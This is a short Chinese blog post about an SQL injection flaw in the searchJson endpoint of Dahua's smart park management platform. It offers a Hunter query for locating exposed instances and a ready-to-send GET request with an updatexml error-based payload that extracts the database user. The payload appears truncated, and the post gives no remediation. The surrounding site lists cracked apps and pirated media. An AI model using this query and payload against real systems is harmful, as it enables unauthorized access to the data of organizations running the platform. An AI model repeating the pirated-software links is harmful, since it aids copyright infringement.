[安全防护] 大华智慧园区综合管理平台searchJson SQL注入漏洞
作者:CC下载站 日期:2023-09-20 02:33:37 浏览:41 分类:web
一、漏洞简介
“大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
二、影响版本
hunter
app.name="Dahua 大华 智慧园区管理平台"登录页面
# 四、漏洞复现![[安全防护] 大华智慧园区综合管理平台searchJson SQL注入漏洞](https://www.cdz423.com/zb_users/upload/2023/09/20230920023355169514843587959.png)
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e)
猜你还喜欢
- 04-01 [科学上网] 直连、中转、专线机场有什么区别|良心高效专线机场推荐|hy2机场推荐
- 03-29 [web] 免费公共DNS大全(IPv6+IPv4)
- 03-29 [玩技术] CTFHUB刷题笔记
- 03-22 [AI配音] 有哪些好用的AI智能配音工具值得推荐?
- 03-15 [web] 轻松申请免费域名并绑定到个人网站 | link顶级域名
- 03-15 [运营] 亚马逊如何选品?产品市场分析怎么做?包括哪些方面?
- 03-15 [web] 3分钟,免费拥有你的专属域名——免费一级域名注册申请及域名解析教程
- 03-14 [学习] 必看!手把手教你自动续期微软E5账号,长期畅享5T OneDrive云盘!
- 03-14 [学习] 白嫖5T微软的OneDrive云盘,微软E5申请,真正的免费不限速!
- 03-14 [学习] 微软onedrive E5创建子账号,实现125T云盘空间25账号,附带Office365激活
- 03-08 [web] 手把手教你开通新加坡华侨银行OCBC账户-保姆级教程
- 03-05 [web] PT站是什么?开放注册的国外国内PT站推荐汇总
取消回复欢迎 你 发表评论:
- 精品推荐!
-
- 最新文章
- 热门文章
- 热评文章
![[书籍] 《炁体源流(上下册)》 道家养生经典辑录 米晶子[pdf]](https://www.cdz423.com/zb_users/upload/2024/05/20240507195357171508283778522.jpeg)
[书籍] 《炁体源流(上下册)》 道家养生经典辑录 米晶子[pdf]
![[即时翻译] 实时打字翻译工具-Typing-translationV3.0](https://www.cdz423.com/zb_users/upload/2024/05/20240507155312171506839246301.png)
[即时翻译] 实时打字翻译工具-Typing-translationV3.0
![[转换工具] TMSpeech 1.0免费实时语音转字幕软件](https://www.cdz423.com/zb_users/upload/2024/05/20240507132446171505948666291.jpeg)
[转换工具] TMSpeech 1.0免费实时语音转字幕软件
![[Android] 电工计算器 v10.0.2.1-h](https://www.cdz423.com/zb_users/upload/2024/05/20240507130950171505859057894.jpeg)
[Android] 电工计算器 v10.0.2.1-h
![[美食] 曾经的黑龙江第一城,藏着中国烧烤王者](https://www.cdz423.com/zb_users/upload/2024/05/20240507125511171505771164617.jpeg)
[美食] 曾经的黑龙江第一城,藏着中国烧烤王者
![[媒体编辑] pyVideoTrans视频翻译和配音 v1.42](https://www.cdz423.com/zb_users/upload/2024/05/20240507125010171505741017569.png)
[媒体编辑] pyVideoTrans视频翻译和配音 v1.42
![[趣味工具] 【桌面动态小装扮】蝴蝶1.0、蟑螂1.2、苍蝇1.3](https://www.cdz423.com/zb_users/upload/2024/05/20240506091116171495787636276.jpeg)
[趣味工具] 【桌面动态小装扮】蝴蝶1.0、蟑螂1.2、苍蝇1.3
![[辅助工具] 《小说角色更名器》+《小说广告清理器》V2.0.1](https://www.cdz423.com/zb_users/upload/2024/05/20240506045440171494248097118.png)
[辅助工具] 《小说角色更名器》+《小说广告清理器》V2.0.1
![[Android] 人体穴位图解 v3.1.3(可离线)支持Android + ios](https://www.cdz423.com/zb_users/upload/2024/05/20240506040925171493976551953.png)
[Android] 人体穴位图解 v3.1.3(可离线)支持Android + ios
![[辅助工具] 微信朋友圈导出工具 WechatMoments v0.0.1便携版](https://www.cdz423.com/zb_users/upload/2024/05/20240506040220171493934051021.png)
[辅助工具] 微信朋友圈导出工具 WechatMoments v0.0.1便携版
![[资料] [大学期末救急课] 猴博士+高斯课堂+斐多课堂,全集视频合集](https://www.cdz423.com/zb_users/upload/2024/03/20240330212550171180515014887.jpeg)
[资料] [大学期末救急课] 猴博士+高斯课堂+斐多课堂,全集视频合集
![[云资源] 价值2万元的老男孩Python教程](https://www.cdz423.com/content/uploadfile/201807/7044a3402019825e1e6a9efe74241bf820180720203647.jpg)
[云资源] 价值2万元的老男孩Python教程
![[书库] 史上最全摄影书推荐(附700本PDF版打包下载)](https://www.cdz423.com/zb_users/upload/2024/04/20240402011121171199148142755.jpeg)
[书库] 史上最全摄影书推荐(附700本PDF版打包下载)
![[云资源] 花了一千多元买的私人健身教程](https://www.cdz423.com/zb_users/upload/2024/03/20240331010425171181826527440.png)
[云资源] 花了一千多元买的私人健身教程
![[下载工具] Internet Download Manager 6.42.7 (IDM)](https://www.cdz423.com/zb_users/upload/2024/03/20240325194507171136710766324.png)
[下载工具] Internet Download Manager 6.42.7 (IDM)
![[影视] 灌篮高手 WEB-DL版下载/Slam Dunk/スラムダンク/灌篮高手:THE FIRST/灌篮高手电影版 2022 The First Slam Dunk 61.35G](https://www.cdz423.com/zb_users/upload/2024/03/20240310103327171003800764975.webp)
[影视] 灌篮高手 WEB-DL版下载/Slam Dunk/スラムダンク/灌篮高手:THE FIRST/灌篮高手电影版 2022 The First Slam Dunk 61.35G
![[资料] 3000 套电影电视剧 LOGO 宣传片常用音效合集包](https://www.cdz423.com/zb_users/upload/2024/02/20240216140536170806353623293.jpeg)
[资料] 3000 套电影电视剧 LOGO 宣传片常用音效合集包
![[安卓软件] 酷我音乐APP_v10.7.6.4 去广告破解豪华VIP版](https://www.cdz423.com/zb_users/upload/2023/10/20231018183151169762511161927.jpeg)
[安卓软件] 酷我音乐APP_v10.7.6.4 去广告破解豪华VIP版
![[即时通讯] 微信PC版WeChat 3.9.9.43 多开防撤回绿色版](https://www.cdz423.com/zb_users/upload/2024/03/20240322092339171107061999329.jpeg)
[即时通讯] 微信PC版WeChat 3.9.9.43 多开防撤回绿色版
![[安卓软件] Solid Explorer文件管理器APP 2.8.38 破解版](https://www.cdz423.com/zb_users/upload/2024/03/20240325183512171136291243256.png)
[安卓软件] Solid Explorer文件管理器APP 2.8.38 破解版
[云资源] 价值2万元的老男孩Python教程
[影视] 灌篮高手 WEB-DL版下载/Slam Dunk/スラムダンク/灌篮高手:THE FIRST/灌篮高手电影版 2022 The First Slam Dunk 61.35G
[云资源] 花了一千多元买的私人健身教程
[书库] 史上最全摄影书推荐(附700本PDF版打包下载)
![[动画] 北斗神拳(1984) [两季合集] [MKV]](https://www.cdz423.com/zb_users/upload/2024/04/20240420013131171354789116711.jpeg)
[动画] 北斗神拳(1984) [两季合集] [MKV]
![[资料] 抗战阵亡将士资料+续编](https://www.cdz423.com/zb_users/upload/2024/04/20240411034831171277851194981.jpeg)
[资料] 抗战阵亡将士资料+续编
![[电视剧] 三体 (2024) 全8集 网飞版本 中文字幕 合集](https://www.cdz423.com/zb_users/upload/2024/03/20240325183741171136306189652.jpeg)
[电视剧] 三体 (2024) 全8集 网飞版本 中文字幕 合集
![[纪录片] 河西走廊【10集 国语 中文字幕 1080P 10.8G MP4】](https://www.cdz423.com/zb_users/upload/2024/03/20240314090934171037857429792.jpeg)
[纪录片] 河西走廊【10集 国语 中文字幕 1080P 10.8G MP4】
![[电影] 2024年喜剧片·热辣滚烫 [mp4]](https://www.cdz423.com/zb_users/upload/2024/02/20240228201247170912236784802.jpeg)
[电影] 2024年喜剧片·热辣滚烫 [mp4]
![[影视] 铁爪 WEB-DL版下载 2023 The Iron Claw 23.48G](https://www.cdz423.com/zb_users/upload/2024/02/20240223003306170861958676145.webp)
[影视] 铁爪 WEB-DL版下载 2023 The Iron Claw 23.48G
- 最新评论
-
我想看看mw2ddyy 评论于:04-26 好东西阿zfy123123 评论于:04-18 谢谢楼主xiaoqi 评论于:04-12 勿在线解压,勿手机解压,请在电脑上用最新款压缩软件解压!推荐360压缩或者好压CC下载站 评论于:04-10 
无法解压啊,客服能不能给个解压教程ravengrey 评论于:04-10 谢谢支持!!CC下载站 评论于:03-26 很棒的资源,感谢分享云体风身 评论于:03-26 感谢分享,好东西云体风身 评论于:03-26 谢谢支持!CC下载站 评论于:03-14 央视精品,感谢付出提供。qwer9009 评论于:03-14
- 热门tag